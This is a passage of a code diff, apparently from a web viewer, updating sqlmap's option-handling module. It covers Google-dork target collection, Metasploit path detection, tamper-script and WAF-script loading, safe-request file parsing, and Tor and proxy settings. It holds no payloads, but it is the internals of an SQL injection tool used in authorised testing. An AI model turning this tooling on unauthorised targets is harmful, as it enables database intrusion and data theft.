||||||
|
raise SqlmapInstallationException, errMsg
|
||||||
|
|
||||||
for node in tree.findall("*"):
|
for node in tree.findall("*"):
|
||||||
queries[node.attrib['value']] = iterate(node)
|
queries[node.attrib['value']] = iterate(node)
|
||||||
|
@ -469,11 +478,12 @@ def _adjustLoggingFormatter():
|
||||||
return
|
return
|
||||||
|
|
||||||
def format(record):
|
def format(record):
|
||||||
_ = boldifyMessage(FORMATTER._format(record))
|
message = FORMATTER._format(record)
|
||||||
if kb.prependFlag:
|
message = boldifyMessage(message)
|
||||||
_ = "\n%s" % _
|
if kb.get("prependFlag"):
|
||||||
|
message = "\n%s" % message
|
||||||
kb.prependFlag = False
|
kb.prependFlag = False
|
||||||
return _
|
return message
|
||||||
|
|
||||||
FORMATTER._format = FORMATTER.format
|
FORMATTER._format = FORMATTER.format
|
||||||
FORMATTER.format = format
|
FORMATTER.format = format
|
||||||
|
@ -489,7 +499,7 @@ def _setRequestFromFile():
|
||||||
|
|
||||||
addedTargetUrls = set()
|
addedTargetUrls = set()
|
||||||
|
|
||||||
conf.requestFile = os.path.expanduser(conf.requestFile)
|
conf.requestFile = safeExpandUser(conf.requestFile)
|
||||||
|
|
||||||
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
|
infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
@ -569,14 +579,14 @@ def _setGoogleDorking():
|
||||||
for link in links:
|
for link in links:
|
||||||
link = urldecode(link)
|
link = urldecode(link)
|
||||||
if re.search(r"(.*?)\?(.+)", link):
|
if re.search(r"(.*?)\?(.+)", link):
|
||||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||||
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
|
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
|
||||||
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
|
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
|
||||||
message = "do you want to scan only results containing GET parameters? [Y/n] "
|
message = "do you want to scan only results containing GET parameters? [Y/n] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
kb.data.onlyGETs = test.lower() != 'n'
|
kb.data.onlyGETs = test.lower() != 'n'
|
||||||
if not kb.data.onlyGETs or conf.googleDork:
|
if not kb.data.onlyGETs or conf.googleDork:
|
||||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||||
|
|
||||||
return links
|
return links
|
||||||
|
|
||||||
|
@ -612,7 +622,7 @@ def _setBulkMultipleTargets():
|
||||||
if not conf.bulkFile:
|
if not conf.bulkFile:
|
||||||
return
|
return
|
||||||
|
|
||||||
conf.bulkFile = os.path.expanduser(conf.bulkFile)
|
conf.bulkFile = safeExpandUser(conf.bulkFile)
|
||||||
|
|
||||||
infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
|
infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
@ -626,7 +636,7 @@ def _setBulkMultipleTargets():
|
||||||
for line in getFileItems(conf.bulkFile):
|
for line in getFileItems(conf.bulkFile):
|
||||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
||||||
found = True
|
found = True
|
||||||
kb.targets.add((line.strip(), None, None, None))
|
kb.targets.add((line.strip(), None, None, None, None))
|
||||||
|
|
||||||
if not found and not conf.forms and not conf.crawlDepth:
|
if not found and not conf.forms and not conf.crawlDepth:
|
||||||
warnMsg = "no usable links found (with GET parameters)"
|
warnMsg = "no usable links found (with GET parameters)"
|
||||||
|
@ -643,7 +653,7 @@ def _setSitemapTargets():
|
||||||
for item in parseSitemap(conf.sitemapUrl):
|
for item in parseSitemap(conf.sitemapUrl):
|
||||||
if re.match(r"[^ ]+\?(.+)", item, re.I):
|
if re.match(r"[^ ]+\?(.+)", item, re.I):
|
||||||
found = True
|
found = True
|
||||||
kb.targets.add((item.strip(), None, None, None))
|
kb.targets.add((item.strip(), None, None, None, None))
|
||||||
|
|
||||||
if not found and not conf.forms and not conf.crawlDepth:
|
if not found and not conf.forms and not conf.crawlDepth:
|
||||||
warnMsg = "no usable links found (with GET parameters)"
|
warnMsg = "no usable links found (with GET parameters)"
|
||||||
|
@ -756,8 +766,14 @@ def _setMetasploit():
|
||||||
|
|
||||||
if conf.msfPath:
|
if conf.msfPath:
|
||||||
for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
|
for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
|
||||||
if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
|
if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
|
||||||
msfEnvPathExists = True
|
msfEnvPathExists = True
|
||||||
|
if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
|
||||||
|
kb.oldMsf = False
|
||||||
|
elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
|
||||||
|
kb.oldMsf = True
|
||||||
|
else:
|
||||||
|
msfEnvPathExists = False
|
||||||
conf.msfPath = path
|
conf.msfPath = path
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -788,12 +804,20 @@ def _setMetasploit():
|
||||||
for envPath in envPaths:
|
for envPath in envPaths:
|
||||||
envPath = envPath.replace(";", "")
|
envPath = envPath.replace(";", "")
|
||||||
|
|
||||||
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
|
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
|
||||||
|
msfEnvPathExists = True
|
||||||
|
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
|
||||||
|
kb.oldMsf = False
|
||||||
|
elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
|
||||||
|
kb.oldMsf = True
|
||||||
|
else:
|
||||||
|
msfEnvPathExists = False
|
||||||
|
|
||||||
|
if msfEnvPathExists:
|
||||||
infoMsg = "Metasploit Framework has been found "
|
infoMsg = "Metasploit Framework has been found "
|
||||||
infoMsg += "installed in the '%s' path" % envPath
|
infoMsg += "installed in the '%s' path" % envPath
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
msfEnvPathExists = True
|
|
||||||
conf.msfPath = envPath
|
conf.msfPath = envPath
|
||||||
|
|
||||||
break
|
break
|
||||||
|
@ -885,16 +909,14 @@ def _setDBMS():
|
||||||
|
|
||||||
if conf.dbms not in SUPPORTED_DBMS:
|
if conf.dbms not in SUPPORTED_DBMS:
|
||||||
errMsg = "you provided an unsupported back-end database management "
|
errMsg = "you provided an unsupported back-end database management "
|
||||||
errMsg += "system. The supported DBMS are %s. " % ', '.join([_ for _ in DBMS_DICT])
|
errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
|
||||||
errMsg += "If you do not know the back-end DBMS, do not provide "
|
errMsg += "If you do not know the back-end DBMS, do not provide "
|
||||||
errMsg += "it and sqlmap will fingerprint it for you."
|
errMsg += "it and sqlmap will fingerprint it for you."
|
||||||
raise SqlmapUnsupportedDBMSException(errMsg)
|
raise SqlmapUnsupportedDBMSException(errMsg)
|
||||||
|
|
||||||
for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \
|
for dbms, aliases in DBMS_ALIASES:
|
||||||
SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \
|
|
||||||
MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES):
|
|
||||||
if conf.dbms in aliases:
|
if conf.dbms in aliases:
|
||||||
conf.dbms = aliases[0]
|
conf.dbms = dbms
|
||||||
|
|
||||||
break
|
break
|
||||||
|
|
||||||
|
@ -944,13 +966,13 @@ def _setTamperingFunctions():
|
||||||
|
|
||||||
try:
|
try:
|
||||||
module = __import__(filename[:-3])
|
module = __import__(filename[:-3])
|
||||||
except ImportError, msg:
|
except (ImportError, SyntaxError), msg:
|
||||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
|
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
|
||||||
|
|
||||||
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
|
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
|
||||||
|
|
||||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||||
if name == "tamper":
|
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
|
||||||
found = True
|
found = True
|
||||||
kb.tamperFunctions.append(function)
|
kb.tamperFunctions.append(function)
|
||||||
function.func_name = module.__name__
|
function.func_name = module.__name__
|
||||||
|
@ -982,6 +1004,11 @@ def _setTamperingFunctions():
|
||||||
errMsg += "in tamper script '%s'" % tfile
|
errMsg += "in tamper script '%s'" % tfile
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
|
||||||
|
warnMsg = "using too many tamper scripts is usually not "
|
||||||
|
warnMsg += "a good idea"
|
||||||
|
logger.warning(warnMsg)
|
||||||
|
|
||||||
if resolve_priorities and priorities:
|
if resolve_priorities and priorities:
|
||||||
priorities.sort(reverse=True)
|
priorities.sort(reverse=True)
|
||||||
kb.tamperFunctions = []
|
kb.tamperFunctions = []
|
||||||
|
@ -1009,13 +1036,15 @@ def _setWafFunctions():
|
||||||
sys.path.insert(0, dirname)
|
sys.path.insert(0, dirname)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
if filename[:-3] in sys.modules:
|
||||||
|
del sys.modules[filename[:-3]]
|
||||||
module = __import__(filename[:-3])
|
module = __import__(filename[:-3])
|
||||||
except ImportError, msg:
|
except ImportError, msg:
|
||||||
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
|
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
|
||||||
|
|
||||||
_ = dict(inspect.getmembers(module))
|
_ = dict(inspect.getmembers(module))
|
||||||
if "detect" not in _:
|
if "detect" not in _:
|
||||||
errMsg = "missing function 'detect(page, headers, code)' "
|
errMsg = "missing function 'detect(get_page)' "
|
||||||
errMsg += "in WAF script '%s'" % found
|
errMsg += "in WAF script '%s'" % found
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
else:
|
else:
|
||||||
|
@ -1068,7 +1097,12 @@ def _setHTTPProxy():
|
||||||
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
|
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
try:
|
||||||
_ = urlparse.urlsplit(conf.proxy)
|
_ = urlparse.urlsplit(conf.proxy)
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex)
|
||||||
|
raise SqlmapSyntaxException, errMsg
|
||||||
|
|
||||||
hostnamePort = _.netloc.split(":")
|
hostnamePort = _.netloc.split(":")
|
||||||
|
|
||||||
scheme = _.scheme.upper()
|
scheme = _.scheme.upper()
|
||||||
|
@ -1116,21 +1150,63 @@ def _setHTTPProxy():
|
||||||
|
|
||||||
proxyHandler.__init__(proxyHandler.proxies)
|
proxyHandler.__init__(proxyHandler.proxies)
|
||||||
|
|
||||||
def _setSafeUrl():
|
def _setSafeVisit():
|
||||||
"""
|
"""
|
||||||
Check and set the safe URL options.
|
Check and set the safe visit options.
|
||||||
"""
|
"""
|
||||||
if not conf.safUrl:
|
if not any ((conf.safeUrl, conf.safeReqFile)):
|
||||||
return
|
return
|
||||||
|
|
||||||
if not re.search("^http[s]*://", conf.safUrl):
|
if conf.safeReqFile:
|
||||||
if ":443/" in conf.safUrl:
|
checkFile(conf.safeReqFile)
|
||||||
conf.safUrl = "https://" + conf.safUrl
|
|
||||||
else:
|
|
||||||
conf.safUrl = "http://" + conf.safUrl
|
|
||||||
|
|
||||||
if conf.saFreq <= 0:
|
raw = readCachedFileContent(conf.safeReqFile)
|
||||||
errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe URL feature"
|
match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
|
||||||
|
|
||||||
|
if match:
|
||||||
|
kb.safeReq.method = match.group(1)
|
||||||
|
kb.safeReq.url = match.group(2)
|
||||||
|
kb.safeReq.headers = {}
|
||||||
|
|
||||||
|
for line in raw[raw.find('\n') + 1:].split('\n'):
|
||||||
|
line = line.strip()
|
||||||
|
if line and ':' in line:
|
||||||
|
key, value = line.split(':', 1)
|
||||||
|
value = value.strip()
|
||||||
|
kb.safeReq.headers[key] = value
|
||||||
|
if key == HTTP_HEADER.HOST:
|
||||||
|
if not value.startswith("http"):
|
||||||
|
scheme = "http"
|
||||||
|
if value.endswith(":443"):
|
||||||
|
scheme = "https"
|
||||||
|
value = "%s://%s" % (scheme, value)
|
||||||
|
kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
post = None
|
||||||
|
|
||||||
|
if '\r\n\r\n' in raw:
|
||||||
|
post = raw[raw.find('\r\n\r\n') + 4:]
|
||||||
|
elif '\n\n' in raw:
|
||||||
|
post = raw[raw.find('\n\n') + 2:]
|
||||||
|
|
||||||
|
if post and post.strip():
|
||||||
|
kb.safeReq.post = post
|
||||||
|
else:
|
||||||
|
kb.safeReq.post = None
|
||||||
|
else:
|
||||||
|
errMsg = "invalid format of a safe request file"
|
||||||
|
raise SqlmapSyntaxException, errMsg
|
||||||
|
else:
|
||||||
|
if not re.search("^http[s]*://", conf.safeUrl):
|
||||||
|
if ":443/" in conf.safeUrl:
|
||||||
|
conf.safeUrl = "https://" + conf.safeUrl
|
||||||
|
else:
|
||||||
|
conf.safeUrl = "http://" + conf.safeUrl
|
||||||
|
|
||||||
|
if conf.safeFreq <= 0:
|
||||||
|
errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
def _setPrefixSuffix():
|
def _setPrefixSuffix():
|
||||||
|
@ -1182,6 +1258,9 @@ def _setHTTPAuthentication():
|
||||||
if not conf.authType and not conf.authCred and not conf.authPrivate:
|
if not conf.authType and not conf.authCred and not conf.authPrivate:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
if conf.authPrivate and not conf.authType:
|
||||||
|
conf.authType = AUTH_TYPE.PKI
|
||||||
|
|
||||||
elif conf.authType and not conf.authCred and not conf.authPrivate:
|
elif conf.authType and not conf.authCred and not conf.authPrivate:
|
||||||
errMsg = "you specified the HTTP authentication type, but "
|
errMsg = "you specified the HTTP authentication type, but "
|
||||||
errMsg += "did not provide the credentials"
|
errMsg += "did not provide the credentials"
|
||||||
|
@ -1192,7 +1271,7 @@ def _setHTTPAuthentication():
|
||||||
errMsg += "but did not provide the type"
|
errMsg += "but did not provide the type"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
elif conf.authType.lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
|
elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
|
||||||
errMsg = "HTTP authentication type value must be "
|
errMsg = "HTTP authentication type value must be "
|
||||||
errMsg += "Basic, Digest, NTLM or PKI"
|
errMsg += "Basic, Digest, NTLM or PKI"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
@ -1248,19 +1327,9 @@ def _setHTTPAuthentication():
|
||||||
debugMsg = "setting the HTTP(s) authentication PEM private key"
|
debugMsg = "setting the HTTP(s) authentication PEM private key"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
key_file = os.path.expanduser(conf.authPrivate)
|
_ = safeExpandUser(conf.authPrivate)
|
||||||
checkFile(key_file)
|
checkFile(_)
|
||||||
authHandler = HTTPSPKIAuthHandler(key_file)
|
authHandler = HTTPSPKIAuthHandler(_)
|
||||||
|
|
||||||
def _setHTTPMethod():
|
|
||||||
"""
|
|
||||||
Check and set the HTTP method to perform HTTP requests through.
|
|
||||||
"""
|
|
||||||
|
|
||||||
conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
|
|
||||||
|
|
||||||
debugMsg = "setting the HTTP method to %s" % conf.method
|
|
||||||
logger.debug(debugMsg)
|
|
||||||
|
|
||||||
def _setHTTPExtraHeaders():
|
def _setHTTPExtraHeaders():
|
||||||
if conf.headers:
|
if conf.headers:
|
||||||
|
@ -1270,6 +1339,9 @@ def _setHTTPExtraHeaders():
|
||||||
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
|
conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
|
||||||
|
|
||||||
for headerValue in conf.headers:
|
for headerValue in conf.headers:
|
||||||
|
if not headerValue.strip():
|
||||||
|
continue
|
||||||
|
|
||||||
if headerValue.count(':') >= 1:
|
if headerValue.count(':') >= 1:
|
||||||
header, value = (_.lstrip() for _ in headerValue.split(":", 1))
|
header, value = (_.lstrip() for _ in headerValue.split(":", 1))
|
||||||
|
|
||||||
|
@ -1387,6 +1459,17 @@ def _setHTTPReferer():
|
||||||
|
|
||||||
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
|
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
|
||||||
|
|
||||||
|
def _setHTTPHost():
|
||||||
|
"""
|
||||||
|
Set the HTTP Host
|
||||||
|
"""
|
||||||
|
|
||||||
|
if conf.host:
|
||||||
|
debugMsg = "setting the HTTP Host header"
|
||||||
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
|
conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
|
||||||
|
|
||||||
def _setHTTPCookies():
|
def _setHTTPCookies():
|
||||||
"""
|
"""
|
||||||
Set the HTTP Cookie header
|
Set the HTTP Cookie header
|
||||||
|
@ -1428,6 +1511,30 @@ def _checkDependencies():
|
||||||
if conf.dependencies:
|
if conf.dependencies:
|
||||||
checkDependencies()
|
checkDependencies()
|
||||||
|
|
||||||
|
def _createTemporaryDirectory():
|
||||||
|
"""
|
||||||
|
Creates temporary directory for this run.
|
||||||
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
if not os.path.isdir(tempfile.gettempdir()):
|
||||||
|
os.makedirs(tempfile.gettempdir())
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "there has been a problem while accessing "
|
||||||
|
errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
|
||||||
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
|
errMsg += "writeable by the current user"
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
|
if "sqlmap" not in (tempfile.tempdir or ""):
|
||||||
|
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
|
||||||
|
|
||||||
|
kb.tempDir = tempfile.tempdir
|
||||||
|
|
||||||
|
if not os.path.isdir(tempfile.tempdir):
|
||||||
|
os.makedirs(tempfile.tempdir)
|
||||||
|
|
||||||
def _cleanupOptions():
|
def _cleanupOptions():
|
||||||
"""
|
"""
|
||||||
Cleanup configuration attributes.
|
Cleanup configuration attributes.
|
||||||
|
@ -1445,7 +1552,7 @@ def _cleanupOptions():
|
||||||
|
|
||||||
for key, value in conf.items():
|
for key, value in conf.items():
|
||||||
if value and any(key.endswith(_) for _ in ("Path", "File")):
|
if value and any(key.endswith(_) for _ in ("Path", "File")):
|
||||||
conf[key] = os.path.expanduser(value)
|
conf[key] = safeExpandUser(value)
|
||||||
|
|
||||||
if conf.testParameter:
|
if conf.testParameter:
|
||||||
conf.testParameter = urldecode(conf.testParameter)
|
conf.testParameter = urldecode(conf.testParameter)
|
||||||
|
@ -1512,8 +1619,8 @@ def _cleanupOptions():
|
||||||
conf.dbms = conf.dbms.capitalize()
|
conf.dbms = conf.dbms.capitalize()
|
||||||
|
|
||||||
if conf.testFilter:
|
if conf.testFilter:
|
||||||
if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]):
|
conf.testFilter = conf.testFilter.strip('*+')
|
||||||
conf.testFilter = conf.testFilter.replace('*', '.*')
|
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
|
||||||
|
|
||||||
if "timeSec" not in kb.explicitSettings:
|
if "timeSec" not in kb.explicitSettings:
|
||||||
if conf.tor:
|
if conf.tor:
|
||||||
|
@ -1579,6 +1686,13 @@ def _cleanupOptions():
|
||||||
threadData = getCurrentThreadData()
|
threadData = getCurrentThreadData()
|
||||||
threadData.reset()
|
threadData.reset()
|
||||||
|
|
||||||
|
def _dirtyPatches():
|
||||||
|
"""
|
||||||
|
Place for "dirty" Python related patches
|
||||||
|
"""
|
||||||
|
|
||||||
|
httplib._MAXLINE = 1 * 1024 * 1024 # to accept overly long result lines (e.g. SQLi results in HTTP header responses)
|
||||||
|
|
||||||
def _purgeOutput():
|
def _purgeOutput():
|
||||||
"""
|
"""
|
||||||
Safely removes (purges) output directory.
|
Safely removes (purges) output directory.
|
||||||
|
@ -1651,8 +1765,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||||
|
|
||||||
kb.chars = AttribDict()
|
kb.chars = AttribDict()
|
||||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||||
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
|
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
|
||||||
|
|
||||||
kb.columnExistsChoice = None
|
kb.columnExistsChoice = None
|
||||||
|
@ -1681,6 +1795,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||||
kb.followSitemapRecursion = None
|
kb.followSitemapRecursion = None
|
||||||
kb.forcedDbms = None
|
kb.forcedDbms = None
|
||||||
kb.forcePartialUnion = False
|
kb.forcePartialUnion = False
|
||||||
|
kb.forceWhere = None
|
||||||
|
kb.futileUnion = None
|
||||||
kb.headersFp = {}
|
kb.headersFp = {}
|
||||||
kb.heuristicDbms = None
|
kb.heuristicDbms = None
|
||||||
kb.heuristicMode = False
|
kb.heuristicMode = False
|
||||||
|
@ -1707,9 +1823,11 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||||
kb.multiThreadMode = False
|
kb.multiThreadMode = False
|
||||||
kb.negativeLogic = False
|
kb.negativeLogic = False
|
||||||
kb.nullConnection = None
|
kb.nullConnection = None
|
||||||
|
kb.oldMsf = None
|
||||||
kb.orderByColumns = None
|
kb.orderByColumns = None
|
||||||
kb.originalCode = None
|
kb.originalCode = None
|
||||||
kb.originalPage = None
|
kb.originalPage = None
|
||||||
|
kb.originalPageTime = None
|
||||||
kb.originalTimeDelay = None
|
kb.originalTimeDelay = None
|
||||||
kb.originalUrls = dict()
|
kb.originalUrls = dict()
|
||||||
|
|
||||||
|
@ -1743,15 +1861,21 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||||
kb.responseTimes = []
|
kb.responseTimes = []
|
||||||
kb.resumeValues = True
|
kb.resumeValues = True
|
||||||
kb.safeCharEncode = False
|
kb.safeCharEncode = False
|
||||||
|
kb.safeReq = AttribDict()
|
||||||
kb.singleLogFlags = set()
|
kb.singleLogFlags = set()
|
||||||
kb.reduceTests = None
|
kb.reduceTests = None
|
||||||
|
kb.tlsSNI = None
|
||||||
kb.stickyDBMS = False
|
kb.stickyDBMS = False
|
||||||
kb.stickyLevel = None
|
kb.stickyLevel = None
|
||||||
|
kb.storeCrawlingChoice = None
|
||||||
kb.storeHashesChoice = None
|
kb.storeHashesChoice = None
|
||||||
kb.suppressResumeInfo = False
|
kb.suppressResumeInfo = False
|
||||||
kb.technique = None
|
kb.technique = None
|
||||||
|
kb.tempDir = None
|
||||||
kb.testMode = False
|
kb.testMode = False
|
||||||
|
kb.testOnlyCustom = False
|
||||||
kb.testQueryCount = 0
|
kb.testQueryCount = 0
|
||||||
|
kb.testType = None
|
||||||
kb.threadContinue = True
|
kb.threadContinue = True
|
||||||
kb.threadException = False
|
kb.threadException = False
|
||||||
kb.tableExistsChoice = None
|
kb.tableExistsChoice = None
|
||||||
|
@ -1788,11 +1912,11 @@ def _useWizardInterface():
|
||||||
message = "Please enter full target URL (-u): "
|
message = "Please enter full target URL (-u): "
|
||||||
conf.url = readInput(message, default=None)
|
conf.url = readInput(message, default=None)
|
||||||
|
|
||||||
message = "POST data (--data) [Enter for None]: "
|
message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||||
conf.data = readInput(message, default=None)
|
conf.data = readInput(message, default=None)
|
||||||
|
|
||||||
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
|
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
|
||||||
warnMsg = "no GET and/or POST parameter(s) found for testing "
|
warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||||
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
|
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
|
||||||
if not conf.crawlDepth and not conf.forms:
|
if not conf.crawlDepth and not conf.forms:
|
||||||
warnMsg += "Will search for forms"
|
warnMsg += "Will search for forms"
|
||||||
|
@ -1888,7 +2012,13 @@ def _saveCmdline():
|
||||||
config.set(family, option, value)
|
config.set(family, option, value)
|
||||||
|
|
||||||
confFP = openFile(paths.SQLMAP_CONFIG, "wb")
|
confFP = openFile(paths.SQLMAP_CONFIG, "wb")
|
||||||
|
|
||||||
|
try:
|
||||||
config.write(confFP)
|
config.write(confFP)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "something went wrong while trying "
|
||||||
|
errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex)
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
|
infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
@ -2080,6 +2210,18 @@ def _setTorSocksProxySettings():
|
||||||
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
|
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
|
||||||
socks.wrapmodule(urllib2)
|
socks.wrapmodule(urllib2)
|
||||||
|
|
||||||
|
def _checkWebSocket():
|
||||||
|
infoMsg = "checking for WebSocket"
|
||||||
|
logger.debug(infoMsg)
|
||||||
|
|
||||||
|
if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
|
||||||
|
try:
|
||||||
|
from websocket import ABNF
|
||||||
|
except ImportError:
|
||||||
|
